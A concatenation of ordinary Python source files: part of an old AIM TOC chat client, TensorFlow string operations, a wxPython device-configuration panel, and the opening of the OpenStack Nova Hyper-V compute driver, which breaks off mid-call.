self._info = "I'm running the Python TOC Module by James Turner <jamwt@jamwt.com>"
self._seq = sysrandom.randint(0,65535)
self.build_funcs()
def build_funcs(self):
self._dir = []
for item in dir(self.__class__):
if item[:3] == "on_" and callable(getattr(self, item)):
self._dir.append(item)
def go(self):
self.connect()
self.process_loop()
def start(self):
pass
def connect(self):
#create the socket object
try:
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except:
raise TOCError, "FATAL: Couldn't create a socket"
# make the connection
try:
self._socket.connect( TOC_SERV )
except:
raise TOCError, "FATAL: Could not connect to TOC Server"
buf = "FLAPON\r\n\r\n"
bsent = self._socket.send(buf)
if bsent != len(buf):
raise TOCError, "FATAL: Couldn't send FLAPON!"
def start_log_in(self):
ep = self.pwdenc()
self._normnick = self.normalize(self._nick)
msg = struct.pack("!HHHH",0,1,1,len(self._normnick)) + self._normnick
self.flap_to_toc(1,msg)
#now, login
self.flap_to_toc(2,"toc_signon %s %s %s %s english %s" % (
TOC_SERV_AUTH[0],TOC_SERV_AUTH[1],self._normnick,ep,self.encode(self._agent) ) )
def normalize(self,data):
data = re.sub("[^A-Za-z0-9]","",data)
return data.lower()
def encode(self,data):
for letter in "\\(){}[]$\"":
data = data.replace(letter,"\\%s"%letter)
return '"' + data + '"'
def flap_to_toc(self,ftype,msg):
if ftype == 2:
msg = msg + struct.pack("!B", 0)
ditems = []
ditems.append("*")
ditems.append(struct.pack("!BHH",ftype,self._seq,len(msg)))
ditems.append(msg)
data = "".join(ditems)
derror( "SEND : \'%r\'" % data )
bsent = self._socket.send(data)
if bsent != len(data):
#maybe make less severe later
raise TOCError, "FATAL: Couldn't send all data to TOC Server\n"
self._seq = self._seq + 1
def pwdenc(self):
lookup = "Tic/Toc"
ept = []
x = 0
for letter in self._passwd:
ept.append("%02x" % ( ord(letter) ^ ord( lookup[x % 7]) ) )
x = x + 1
return "0x" + "".join(ept)
def process_loop(self):
# the "main" loop
while 1:
event = self.recv_event()
if not event:
continue
derror( "RECV : %r" % event[1] )
#else, fig out what to do with it
#special case-- login
if event[0] == 1:
self.start_log_in()
continue
if not event[1].count(":"):
data = ""
else:
ind = event[1].find(":")
id = event[1][:ind].upper()
data = event[1][ind+1:]
#handle manually now
if id == "SIGN_ON":
self.c_SIGN_ON(id,data)
continue
if id == "ERROR":
self.c_ERROR(id,data)
continue
#their imp
if ("on_%s" % id ) in self._dir:
exec ( "self.on_%s(data)" % id )
else:
werror("INFO : Received unimplemented '%s' id" % id)
def recv_event(self):
header = self._socket.recv(6)
if header == "":
self.err_disconnect()
return
(marker,mtype,seq,buflen) = struct.unpack("!sBhh",header)
#get the info
dtemp = self._socket.recv(buflen)
data = dtemp
while len(data) != buflen:
if dtemp == "":
self.err_disconnect()
return
dtemp = self._socket.recv(buflen - len(data))
data = data + dtemp
return (mtype, data)
def err_disconnect(self):
sys.stdout.write("ERROR: We seem to have been disconnected from the TOC server.\n")
sys.exit(0)
# our event handling
def c_ERROR(self,id,data):
# let's just grab the errors we care about!
#still more fields
if data.count(":"):
data = int (data[:data.find(":")])
else:
data = int(data) # let's get an int outta it
if data == 980:
raise TOCError, "FATAL: Couldn't sign on; Incorrect nickname/password combination"
if data == 981:
raise TOCError, "FATAL: Couldn't sign on; The AIM service is temporarily unavailable"
elif data == 982:
raise TOCError, "FATAL: Couldn't sign on; Your warning level is too high"
elif data == 983:
raise TOCError, "FATAL: Couldn't sign on; You have been connecting and disconnecting too frequently"
elif data == 989:
raise TOCError, "FATAL: Couldn't sign on; An unknown error occurred"
# ... etc etc etc
else:
# try to let further implementation handle it
if ("on_%s" % id ) in self._dir:
exec ( "self.on_%s(data)" % id )
else:
werror("ERROR: The TOC server sent an unhandled error code: #%d" % data)
def c_SIGN_ON(self,type,data):
self.flap_to_toc(2,"toc_add_buddy jamwt") # needs to start up corectly
self.flap_to_toc(2,"toc_set_info %s" % self.encode(self._info) )
self.flap_to_toc(2,"toc_init_done")
self.start()
def strip_html(self,data):
return re.sub("<[^>]*>","",data)
def normbuds(self,buddies):
nbuds = []
for buddy in buddies:
nbuds.append(self.normalize(buddy))
return " ".join(nbuds)
#actions--help the user w/common tasks
#the all-important
def do_SEND_IM(self,user,message):
self.flap_to_toc(2,"toc_send_im %s %s" % ( self.normalize(user), self.encode(message) ) )
def do_ADD_BUDDY(self,buddies):
self.flap_to_toc(2,"toc_add_buddy %s" % " ".join(self.normbuds(buddies) ) )
def do_ADD_PERMIT(self,buddies):
self.flap_to_toc(2,"toc_add_permit %s" % " ".join(self.normbuds(buddies) ) )
def do_ADD_DENY(self,buddies):
self.flap_to_toc(2,"toc_add_deny %s" % " ".join(self.normbuds(buddies) ) )
def do_REMOVE_BUDDY(self,buddies):
self.flap_to_toc(2,"toc_remove_buddy %s" % " ".join(self.normbuds(buddies) ) )
# away, idle, user info handling
def do_SET_IDLE(self,itime):
self.flap_to_toc(2,"toc_set_idle %d" % itime )
def do_SET_AWAY(self,awaymess):
if awaymess == "":
self.flap_to_toc(2,"toc_set_away")
return
self.flap_to_toc(2,"toc_set_away %s" % self.encode(awaymess) )
def do_GET_INFO(self,user):
self.flap_to_toc(2,"toc_get_info %s" % self.normalize(user) )
def do_SET_INFO(self,info):
self.flap_to_toc(2,"toc_set_info %s" % self.encode(info) )
# warning capability
def do_EVIL(self,user,anon=0):
if anon:
acode = "anon"
else:
acode = "norm"
self.flap_to_toc(2,"toc_evil %s %s" % (self.normalize(user), acode) )
#chat
def do_CHAT_INVITE(self,room,imess,buddies):
self.flap_to_toc(2,"toc_chat_invite %s %s %s" % (self.normalize(room),
self.encode(imess), self.normbuds(buddies) ) )
def do_CHAT_ACCEPT(self, id):
self.flap_to_toc(2,"toc_chat_accept %s" % id)
def do_CHAT_LEAVE(self,id):
self.flap_to_toc(2,"toc_chat_leave %s" % id)
def do_CHAT_WHISPER(self,room,user,message):
self.flap_to_toc(2,"toc_chat_whisper %s %s %s" % (room,
self.normalize(user), self.encode(message) ) )
def do_CHAT_SEND(self,room,message):
self.flap_to_toc(2,"toc_chat_send %s %s" % (room,
self.encode(message) ) )
def do_CHAT_JOIN(self,roomname):
self.flap_to_toc(2,"toc_chat_join 4 %s" % roomname)
def do_SET_CONFIG(self,configstr):
self.flap_to_toc(2,"toc_set_config \"%s\"" % configstr)
#todo more later!
def werror(errorstr):
if DEBUG:
sys.stdout.write("%s\n"%errorstr)
def derror(errorstr):
if DEBUG > 1:
sys.stdout.write("%s\n"%errorstr)
|
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Operations for working with string Tensors."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.compat import compat
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_parsing_ops
from tensorflow.python.ops import gen_string_ops
from tensorflow.python.ops import math_ops
# go/tf-wildcard-import
# pylint: disable=wildcard-import
# pylint: disable=g-bad-import-order
from tensorflow.python.ops.gen_string_ops import *
from tensorflow.python.util import compat as util_compat
from tensorflow.python.util import deprecation
from tensorflow.python.util import dispatch
from tensorflow.python.util.tf_export import tf_export
# pylint: enable=g-bad-import-order
# pylint: enable=wildcard-import
# pylint: disable=redefined-builtin
@tf_export("strings.regex_full_match")
@dispatch.add_dispatch_support
def regex_full_match(input, pattern, name=None):
r"""Match elements of `input` with regex `pattern`.
Args:
input: string `Tensor`, the source strings to process.
pattern: string or scalar string `Tensor`, regular expression to use,
see more details at https://github.com/google/re2/wiki/Syntax
name: Name of the op.
Returns:
bool `Tensor` of the same shape as `input` with match results.
"""
# TODO(b/112455102): Remove compat.forward_compatible once past the horizon.
if not compat.forward_compatible(2018, 11, 10):
return gen_string_ops.regex_full_match(
input=input, pattern=pattern, name=name)
if isinstance(pattern, util_compat.bytes_or_text_types):
# When `pattern` is static through the life of the op we can
# use a version which performs the expensive regex compilation once at
# creation time.
return gen_string_ops.static_regex_full_match(
input=input, pattern=pattern, name=name)
return gen_string_ops.regex_full_match(
input=input, pattern=pattern, name=name)
regex_full_match.__doc__ = gen_string_ops.regex_full_match.__doc__
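# A minimal usage sketch (TF 1.x graph mode; values are made up): with a
# static Python string pattern, the cheaper static op is dispatched
# automatically by the wrapper above.
#
#   >>> m = regex_full_match(["TensorFlow", "12345"], pattern=r"\d+")
#   >>> # evaluates to [False, True] when run in a session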
@tf_export(
"strings.regex_replace", v1=["strings.regex_replace", "regex_replace"])
@deprecation.deprecated_endpoints("regex_replace")
@dispatch.add_dispatch_support
def regex_replace(input, pattern, rewrite, replace_global=True, name=None):
r"""Replace elements of `input` matching regex `pattern` with `rewrite`.
Args:
input: string `Tensor`, the source strings to process.
pattern: string or scalar string `Tensor`, regular expression to use,
see more details at https://github.com/google/re2/wiki/Syntax
rewrite: string or scalar string `Tensor`, value to use in match
replacement. Supports backslash-escaped digits (\1 to \9), which can be
used to insert text matching the corresponding parenthesized group.
replace_global: `bool`, if `True` replace all non-overlapping matches,
else replace only the first match.
name: A name for the operation (optional).
Returns:
string `Tensor` of the same shape as `input` with specified replacements.
"""
if (isinstance(pattern, util_compat.bytes_or_text_types) and
isinstance(rewrite, util_compat.bytes_or_text_types)):
# When `pattern` and `rewrite` are static through the life of the op we can
# use a version which performs the expensive regex compilation once at
# creation time.
return gen_string_ops.static_regex_replace(
input=input, pattern=pattern,
rewrite=rewrite, replace_global=replace_global,
name=name)
return gen_string_ops.regex_replace(
input=input, pattern=pattern,
rewrite=rewrite, replace_global=replace_global,
name=name)
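# A minimal usage sketch for regex_replace (values are made up): collapse
# every run of digits into a single '#'.
#
#   >>> r = regex_replace(["a1b22c333"], pattern=r"\d+", rewrite="#")
#   >>> # evaluates to ["a#b#c#"] when run in a session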
@tf_export("strings.format")
def string_format(template, inputs, placeholder="{}", summarize=3, name=None):
r"""Formats a string template using a list of tensors.
Formats a string template using a list of tensors, abbreviating tensors by
only printing the first and last `summarize` elements of each dimension
(recursively). If formatting only one tensor into a template, the tensor does
not have to be wrapped in a list.
Example:
Formatting a single-tensor template:
```python
sess = tf.Session()
with sess.as_default():
tensor = tf.range(10)
formatted = tf.strings.format("tensor: {}, suffix", tensor)
out = sess.run(formatted)
expected = "tensor: [0 1 2 ... 7 8 9], suffix"
assert(out.decode() == expected)
```
Formatting a multi-tensor template:
```python
sess = tf.Session()
with sess.as_default():
tensor_one = tf.reshape(tf.range(100), [10, 10])
tensor_two = tf.range(10)
formatted = tf.strings.format("first: {}, second: {}, suffix",
(tensor_one, tensor_two))
out = sess.run(formatted)
expected = ("first: [[0 1 2 ... 7 8 9]\n"
" [10 11 12 ... 17 18 19]\n"
" [20 21 22 ... 27 28 29]\n"
" ...\n"
" [70 71 72 ... 77 78 79]\n"
" [80 81 82 ... 87 88 89]\n"
" [90 91 92 ... 97 98 99]], second: [0 1 2 ... 7 8 9], suffix")
assert(out.decode() == expected)
```
Args:
template: A string template to format tensor values into.
inputs: A list of `Tensor` objects, or a single Tensor.
The list of tensors to format into the template string. If a solitary
tensor is passed in, the input tensor will automatically be wrapped as a
list.
placeholder: An optional `string`. Defaults to `{}`.
At each placeholder occurring in the template, a subsequent tensor
will be inserted.
summarize: An optional `int`. Defaults to `3`.
When formatting the tensors, show the first and last `summarize`
entries of each tensor dimension (recursively). If set to -1, all
elements of the tensor will be shown.
name: A name for the operation (optional).
Returns:
A scalar `Tensor` of type `string`.
Raises:
ValueError: if the number of placeholders does not match the number of
inputs.
"""
# If there is only one tensor to format, we will automatically wrap it in a
# list to simplify the user experience
if tensor_util.is_tensor(inputs):
inputs = [inputs]
if template.count(placeholder) != len(inputs):
raise ValueError("%s placeholder(s) in template does not match %s tensor(s)"
" provided as input" % (template.count(placeholder),
len(inputs)))
return gen_string_ops.string_format(inputs,
template=template,
placeholder=placeholder,
summarize=summarize,
name=name)
@tf_export("string_split")
def string_split(source, delimiter=" ", skip_empty=True): # pylint: disable=invalid-name
"""Split elements of `source` based on `delimiter` into a `SparseTensor`.
Let N be the size of source (typically N will be the batch size). Split each
element of `source` based on `delimiter` and return a `SparseTensor`
containing the split tokens. Empty tokens are ignored.
If `delimiter` is an empty string, each element of the `source` is split
into individual strings, each containing one byte. (This includes splitting
multibyte sequences of UTF-8.) If delimiter contains multiple bytes, it is
treated as a set of delimiters with each considered a potential split point.
For example:
N = 2, source[0] is 'hello world' and source[1] is 'a b c', then the output
will be
st.indices = [0, 0;
0, 1;
1, 0;
1, 1;
1, 2]
st.shape = [2, 3]
st.values = ['hello', 'world', 'a', 'b', 'c']
Args:
source: `1-D` string `Tensor`, the strings to split.
delimiter: `0-D` string `Tensor`, the delimiter character(s). May be empty
or contain multiple characters, as described above.
skip_empty: A `bool`. If `True`, skip the empty strings from the result.
Raises:
ValueError: If delimiter is not a string.
Returns:
A `SparseTensor` of rank `2`, the strings split according to the delimiter.
The first column of the indices corresponds to the row in `source` and the
second column corresponds to the index of the split component in this row.
"""
delimiter = ops.convert_to_tensor(delimiter, dtype=dtypes.string)
source = ops.convert_to_tensor(source, dtype=dtypes.string)
indices, values, shape = gen_string_ops.string_split(
source, delimiter=delimiter, skip_empty=skip_empty)
indices.set_shape([None, 2])
values.set_shape([None])
shape.set_shape([2])
return sparse_tensor.SparseTensor(indices, values, shape)
@tf_export("strings.split")
def string_split_v2(source, sep=None, maxsplit=-1):
"""Split elements of `source` based on `sep` into a `SparseTensor`.
Let N be the size of source (typically N will be the batch size). Split each
element of `source` based on `sep` and return a `SparseTensor`
containing the split tokens. Empty tokens are ignored.
For example, N = 2, source[0] is 'hello world' and source[1] is 'a b c',
then the output will be
st.indices = [0, 0;
0, 1;
1, 0;
1, 1;
1, 2]
st.shape = [2, 3]
st.values = ['hello', 'world', 'a', 'b', 'c']
If `sep` is given, consecutive delimiters are not grouped together and are
deemed to delimit empty strings. For example, source of `"1<>2<><>3"` and
sep of `"<>"` returns `["1", "2", "", "3"]`. If `sep` is None or an empty
string, consecutive whitespace is regarded as a single separator, and the
result will contain no empty strings at the start or end if the string has
leading or trailing whitespace.
Note that the above-mentioned behavior matches Python's str.split.
Args:
source: `1-D` string `Tensor`, the strings to split.
sep: `0-D` string `Tensor`, the delimiter character.
maxsplit: An `int`. If `maxsplit > 0`, limits the number of splits, so the
result has at most `maxsplit + 1` elements.
Raises:
ValueError: If sep is not a string.
Returns:
A `SparseTensor` of rank `2`, the strings split according to the delimiter.
The first column of the indices corresponds to the row in `source` and the
second column corresponds to the index of the split component in this row.
"""
if sep is None:
sep = ""
sep = ops.convert_to_tensor(sep, dtype=dtypes.string)
source = ops.convert_to_tensor(source, dtype=dtypes.string)
indices, values, shape = gen_string_ops.string_split_v2(
source, sep=sep, maxsplit=maxsplit)
indices.set_shape([None, 2])
values.set_shape([None])
shape.set_shape([2])
return sparse_tensor.SparseTensor(indices, values, shape)
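# Illustrative contrast of the two splitting modes documented above
# (made-up values):
#
#   >>> string_split_v2(["1<>2<><>3"], sep="<>").values
#   >>> # -> ['1', '2', '', '3']: an explicit sep keeps empty tokens
#   >>> string_split_v2(["  hello   world "]).values
#   >>> # -> ['hello', 'world']: whitespace runs collapse, no empties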
def _reduce_join_reduction_dims(x, axis, reduction_indices):
"""Returns range(rank(x) - 1, 0, -1) if reduction_indices is None."""
# TODO(aselle): Remove this after deprecation
if reduction_indices is not None:
if axis is not None:
raise ValueError("Can't specify both 'axis' and 'reduction_indices'.")
axis = reduction_indices
if axis is not None:
return axis
else:
# Fast path: avoid creating Rank and Range ops if ndims is known.
if x.get_shape().ndims is not None:
return constant_op.constant(
np.arange(x.get_shape().ndims - 1, -1, -1), dtype=dtypes.int32)
# Otherwise, we rely on Range and Rank to do the right thing at run-time.
return math_ops.range(array_ops.rank(x) - 1, -1, -1)
@tf_export(v1=["strings.reduce_join", "reduce_join"])
@deprecation.deprecated_endpoints("reduce_join")
def reduce_join(inputs, axis=None, # pylint: disable=missing-docstring
keep_dims=False,
separator="",
name=None,
reduction_indices=None):
inputs_t = ops.convert_to_tensor(inputs)
reduction_indices = _reduce_join_reduction_dims(
inputs_t, axis, reduction_indices)
return gen_string_ops.reduce_join(
inputs=inputs_t,
reduction_indices=reduction_indices,
keep_dims=keep_dims,
separator=separator,
name=name)
@tf_export("strings.reduce_join", v1=[])
def reduce_join_v2( # pylint: disable=missing-docstring
inputs,
axis=None,
keepdims=False,
separator="",
name=None):
return reduce_join(
inputs, axis, keep_dims=keepdims, separator=separator, name=name)
reduce_join.__doc__ = deprecation.rewrite_argument_docstring(
gen_string_ops.reduce_join.__doc__, "reduction_indices", "axis")
reduce_join.__doc__ = reduce_join.__doc__.replace("tf.reduce_join(",
"tf.strings.reduce_join(")
# This wrapper provides backwards compatibility for code that predates the
# unit argument and that passed 'name' as a positional argument.
@tf_export(v1=["strings.length"])
@dispatch.add_dispatch_support
def string_length(input, name=None, unit="BYTE"):
return gen_string_ops.string_length(input, unit=unit, name=name)
@tf_export("strings.length", v1=[])
@dispatch.add_dispatch_support
def string_length_v2(input, unit="BYTE", name=None):
return string_length(input, name, unit)
string_length.__doc__ = gen_string_ops.string_length.__doc__
@tf_export(v1=["substr"])
@deprecation.deprecated(None, "Use `tf.strings.substr` instead of `tf.substr`.")
def substr_deprecated(input, pos, len, name=None, unit="BYTE"):
return substr(input, pos, len, name=name, unit=unit)
substr_deprecated.__doc__ = gen_string_ops.substr.__doc__
@tf_export(v1=["strings.substr"])
@dispatch.add_dispatch_support
def substr(input, pos, len, name=None, unit="BYTE"):
return gen_string_ops.substr(input, pos, len, unit=unit, name=name)
substr.__doc__ = gen_string_ops.substr.__doc__
@tf_export("strings.substr", v1=[])
@dispatch.add_dispatch_support
def substr_v2(input, pos, len, unit="BYTE", name=None):
return gen_string_ops.substr(input, pos, len, unit=unit, name=name)
substr_v2.__doc__ = gen_string_ops.substr.__doc__
ops.NotDifferentiable("RegexReplace")
ops.NotDifferentiable("StringToHashBucket")
ops.NotDifferentiable("StringToHashBucketFast")
ops.NotDifferentiable("StringToHashBucketStrong")
ops.NotDifferentiable("ReduceJoin")
ops.NotDifferentiable("StringJoin")
ops.NotDifferentiable("StringSplit")
ops.NotDifferentiable("AsString")
ops.NotDifferentiable("EncodeBase64")
ops.NotDifferentiable("DecodeBase64")
@tf_export("strings.to_number", v1=[])
@dispatch.add_dispatch_support
def string_to_number(input, out_type=dtypes.float32, name=None):
r"""Converts each string in the input Tensor to the specified numeric type.
(Note that int32 overflow results in an error while float overflow
results in a rounded value.)
Args:
input: A `Tensor` of type `string`.
out_type: An optional `tf.DType` from: `tf.float32, tf.float64, tf.int32,
tf.int64`. Defaults to `tf.float32`.
The numeric type to interpret each string in `string_tensor` as.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `out_type`.
"""
return gen_parsing_ops.string_to_number(input, out_type, name)
tf_export(v1=["strings.to_number", "string_to_number"])(
gen_parsing_ops.string_to_number
)
@tf_export("strings.to_hash_bucket", v1=[])
@dispatch.add_dispatch_support
def string_to_hash_bucket(input, num_buckets, name=None):
# pylint: disable=line-too-long
r"""Converts each string in the input Tensor to its hash mod by a number of buckets.
The hash function is deterministic on the content of the string within the
process.
Note that the hash function may change from time to time.
This functionality will be deprecated; it is recommended to use
`tf.string_to_hash_bucket_fast()` or `tf.string_to_hash_bucket_strong()` instead.
Args:
input: A `Tensor` of type `string`.
num_buckets: An `int` that is `>= 1`. The number of buckets.
name: A name for the operation (optional).
Returns:
A `Tensor` of type `int64`.
"""
# pylint: enable=line-too-long
return gen_string_ops.string_to_hash_bucket(input, num_buckets, name)
tf_export(v1=["strings.to_hash_bucket", "string_to_hash_bucket"])(
gen_string_ops.string_to_hash_bucket
)
|
|
"""
An interface for creating and editing DeviceConfig objects.
"""
import ObjectListView
from threading import Thread
from time import sleep
import wx
from spacq.devices.config import DeviceConfig
from ..tool.box import MessageDialog
from .device.device_config import DeviceConfigDialog
class DeviceColumnDefn(ObjectListView.ColumnDefn):
"""
A column with useful defaults.
"""
def __init__(self, align='left', *args, **kwargs):
ObjectListView.ColumnDefn.__init__(self, align=align, *args, **kwargs)
# No auto-width if space filling.
if self.isSpaceFilling:
self.width = 0
class DevicesPanel(wx.Panel):
col_name = DeviceColumnDefn(title='Name', valueGetter='name', width=200)
col_connection = DeviceColumnDefn(title='Connection', width=110,
valueGetter=lambda x: 'Connected' if x.device is not None else 'Disconnected')
col_setup = DeviceColumnDefn(title='Setup', width=70,
valueGetter=lambda x: 'Setup...' if x.gui_setup is not None else '')
col_status = DeviceColumnDefn(title='Status', isSpaceFilling=True, isEditable=False,
valueGetter=lambda x: (x.device.status[0] if x.device.status else 'Idle') if x.device is not None else '')
def __init__(self, parent, global_store, dialog_owner, *args, **kwargs):
wx.Panel.__init__(self, parent, *args, **kwargs)
self.global_store = global_store
self.dialog_owner = dialog_owner
# Panel.
panel_box = wx.BoxSizer(wx.VERTICAL)
## OLV.
self.olv = ObjectListView.FastObjectListView(self)
panel_box.Add(self.olv, proportion=1, flag=wx.ALL|wx.EXPAND)
self.olv.SetColumns([self.col_name, self.col_connection, self.col_setup, self.col_status])
self.olv.SetSortColumn(self.col_name)
self.olv.cellEditMode = self.olv.CELLEDIT_DOUBLECLICK
self.olv.Bind(ObjectListView.EVT_CELL_EDIT_STARTING, self.OnCellEditStarting)
self.olv.Bind(ObjectListView.EVT_CELL_EDIT_FINISHING, self.OnCellEditFinishing)
## Buttons.
button_box = wx.BoxSizer(wx.HORIZONTAL)
panel_box.Add(button_box, proportion=0, flag=wx.ALL|wx.CENTER)
### Row buttons.
row_box = wx.BoxSizer(wx.HORIZONTAL)
button_box.Add(row_box)
add_button = wx.Button(self, wx.ID_ADD)
add_button.Bind(wx.EVT_BUTTON, self.OnAddDevice)
row_box.Add(add_button)
remove_button = wx.Button(self, wx.ID_REMOVE)
remove_button.Bind(wx.EVT_BUTTON, self.OnRemoveDevices)
row_box.Add(remove_button)
self.SetMinSize((600, 250))
self.SetSizer(panel_box)
with self.global_store.devices.lock:
for name, dev in self.global_store.devices.iteritems():
self.olv.AddObject(dev)
def update_resources(self, old, new):
"""
Inform everybody of updated resources.
"""
(appeared, changed, disappeared) = old.diff_resources(new)
with self.global_store.resources.lock:
# Check for conflicts.
conflicting_resources = [label for label in appeared if label in self.global_store.resources]
if conflicting_resources:
return conflicting_resources
# Set up the resources.
for label in disappeared.union(changed):
del self.global_store.resources[label]
for label in appeared.union(changed):
self.global_store.resources[label] = new.resources[label]
return []
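# Illustrative walk-through of the diff semantics above (hypothetical
# labels): if old exposes {'a', 'b'} and new exposes a changed 'b' plus a
# new 'c', then appeared={'c'}, changed={'b'}, disappeared={'a'}; 'a' and
# the stale 'b' are unregistered and 'b', 'c' are (re)registered, unless
# 'c' already exists globally, in which case ['c'] is returned as a
# conflict.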
def OnCellEditStarting(self, evt):
col = evt.objectListView.columns[evt.subItemIndex]
dev = evt.rowModel
# Ignore frivolous requests.
if evt.rowIndex < 0:
evt.Veto()
return
veto = False
if col == self.col_connection:
def ok_callback(dlg):
dev_new = dlg.GetValue()
# Use the new instance.
with self.global_store.devices.lock:
del self.global_store.devices[dev.name]
self.global_store.devices[dev_new.name] = dev_new
conflicting_resources = self.update_resources(dev, dev_new)
if conflicting_resources:
MessageDialog(self, ', '.join(conflicting_resources), 'Conflicting resources').Show()
return False
# Close the old device as necessary.
if dev.device is not None and dev_new.device != dev.device:
dev.device.close()
self.olv.RemoveObject(dev)
self.olv.AddObject(dev_new)
return True
dlg = DeviceConfigDialog(self, ok_callback, title=dev.name)
dlg.SetValue(dev)
dlg.Show()
veto = True
elif col == self.col_setup:
if dev.gui_setup is not None:
dev.gui_setup(self.dialog_owner, self.global_store, dev.name).Show()
veto = True
if veto:
# No need to use the default editor.
evt.Veto()
def OnCellEditFinishing(self, evt):
col = evt.objectListView.columns[evt.subItemIndex]
if col == self.col_name:
dev = evt.rowModel # With old name.
dev_new_name = evt.editor.Value
if dev_new_name == dev.name:
# Not actually changed.
return
# Attempt to add a new entry first.
try:
self.global_store.devices[dev_new_name] = dev
except KeyError:
MessageDialog(self, dev_new_name, 'Device name conflicts').Show()
evt.Veto()
return
# Remove the old entry.
del self.global_store.devices[dev.name]
def OnAddDevice(self, evt=None):
"""
Add a blank device to the OLV.
"""
# Ensure that we get a unique name.
with self.global_store.devices.lock:
num = 1
done = False
while not done:
name = 'New device {0}'.format(num)
dev_cfg = DeviceConfig(name=name)
try:
self.global_store.devices[name] = dev_cfg
except KeyError:
num += 1
else:
done = True
self.olv.AddObject(dev_cfg)
# OLV likes to select a random item at this point.
self.olv.DeselectAll()
def OnRemoveDevices(self, evt=None):
"""
Remove all selected devices from the OLV.
"""
selected = self.olv.GetSelectedObjects()
connected_devices = set()
for row in selected:
if row.device is not None:
connected_devices.add(row.name)
if connected_devices:
MessageDialog(self, ', '.join(sorted(connected_devices)), 'Devices still connected').Show()
return
if selected:
self.olv.RemoveObjects(selected)
for row in selected:
del self.global_store.devices[row.name]
class DeviceConfigFrame(wx.Frame):
def __init__(self, parent, global_store, close_callback, *args, **kwargs):
wx.Frame.__init__(self, parent, title='Device Configuration', *args, **kwargs)
self.close_callback = close_callback
# Frame.
frame_box = wx.BoxSizer(wx.VERTICAL)
## Devices.
self.devices_panel = DevicesPanel(self, global_store, parent)
frame_box.Add(self.devices_panel, proportion=1, flag=wx.EXPAND)
self.SetSizerAndFit(frame_box)
self.Bind(wx.EVT_CLOSE, self.OnClose)
thr = Thread(target=self.status_poller)
thr.daemon = True
thr.start()
def status_poller(self):
"""
Keep updating the status as long as the frame is open.
"""
while True:
try:
wx.CallAfter(self.devices_panel.olv.RefreshObjects)
except wx.PyDeadObjectError:
# The panel has left the building.
return
sleep(0.2)
def OnClose(self, evt):
self.close_callback()
evt.Skip()
|
|
# Copyright (c) 2010 Cloud.com, Inc
# Copyright (c) 2012 Cloudbase Solutions Srl
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
A Hyper-V Nova Compute driver.
"""
import platform
from oslo_log import log as logging
from nova.i18n import _
from nova.virt import driver
from nova.virt.hyperv import hostops
from nova.virt.hyperv import livemigrationops
from nova.virt.hyperv import migrationops
from nova.virt.hyperv import rdpconsoleops
from nova.virt.hyperv import snapshotops
from nova.virt.hyperv import vmops
from nova.virt.hyperv import volumeops
LOG = logging.getLogger(__name__)
class HyperVDriver(driver.ComputeDriver):
def __init__(self, virtapi):
super(HyperVDriver, self).__init__(virtapi)
self._hostops = hostops.HostOps()
self._volumeops = volumeops.VolumeOps()
self._vmops = vmops.VMOps()
self._snapshotops = snapshotops.SnapshotOps()
self._livemigrationops = livemigrationops.LiveMigrationOps()
self._migrationops = migrationops.MigrationOps()
self._rdpconsoleops = rdpconsoleops.RDPConsoleOps()
def init_host(self, host):
self._vmops.restart_vm_log_writers()
def list_instance_uuids(self):
return self._vmops.list_instance_uuids()
def list_instances(self):
return self._vmops.list_instances()
def spawn(self, context, instance, image_meta, injected_files,
admin_password, network_info=None, block_device_info=None):
self._vmops.spawn(context, instance, image_meta, injected_files,
admin_password, network_info, block_device_info)
def reboot(self, context, instance, network_info, reboot_type,
block_device_info=None, bad_volumes_callback=None):
self._vmops.reboot(instance, network_info, reboot_type)
def destroy(self, context, instance, network_info, block_device_info=None,
destroy_disks=True, migrate_data=None):
self._vmops.destroy(instance, network_info, block_device_info,
destroy_disks)
def cleanup(self, context, instance, network_info, block_device_info=None,
destroy_disks=True, migrate_data=None, destroy_vifs=True):
"""Cleanup after instance being destroyed by Hypervisor."""
pass
def get_info(self, instance):
return self._vmops.get_info(instance)
def attach_volume(self, context, connection_info, instance, mountpoint,
disk_bus=None, device_type=None, encryption=None):
return self._volumeops.attach_volume(connection_info,
instance.name)
def detach_volume(self, connection_info, instance, mountpoint,
encryption=None):
return self._volumeops.detach_volume(connection_info,
instance.name)
def get_volume_connector(self, instance):
return self._volumeops.get_volume_connector(instance)
def get_available_resource(self, nodename):
return self._hostops.get_available_resource()
def get_available_nodes(self, refresh=False):
return [platform.node()]
def host_power_action(self, action):
return self._hostops.host_power_action(action)
def snapshot(self, context, instance, image_id, update_task_state):
self._snapshotops.snapshot(context, instance, image_id,
update_task_state)
def pause(self, instance):
self._vmops.pause(instance)
def unpause(self, instance):
self._vmops.unpause(instance)
def suspend(self, context, instance):
self._vmops.suspend(instance)
def resume(self, context, instance, network_info, block_device_info=None):
self._vmops.resume(instance)
def power_off(self, instance, timeout=0, retry_interval=0):
self._vmops.power_off(instance, timeout, retry_interval)
def power_on(self, context, instance, network_info,
block_device_info=None):
self._vmops.power_on(instance, block_device_info)
def resume_state_on_host_boot(self, context, instance, network_info,
block_device_info=None):
"""Resume guest state when a host is booted."""
self._vmops.resume_state_on_host_boot(context, instance, network_info,
block_device_info)
def live_migration(self, context, instance, dest, post_method,
recover_method, block_migration=False,
migrate_data=None):
self._livemigrationops.live_migration(context, instance, dest,
post_method, recover_method,
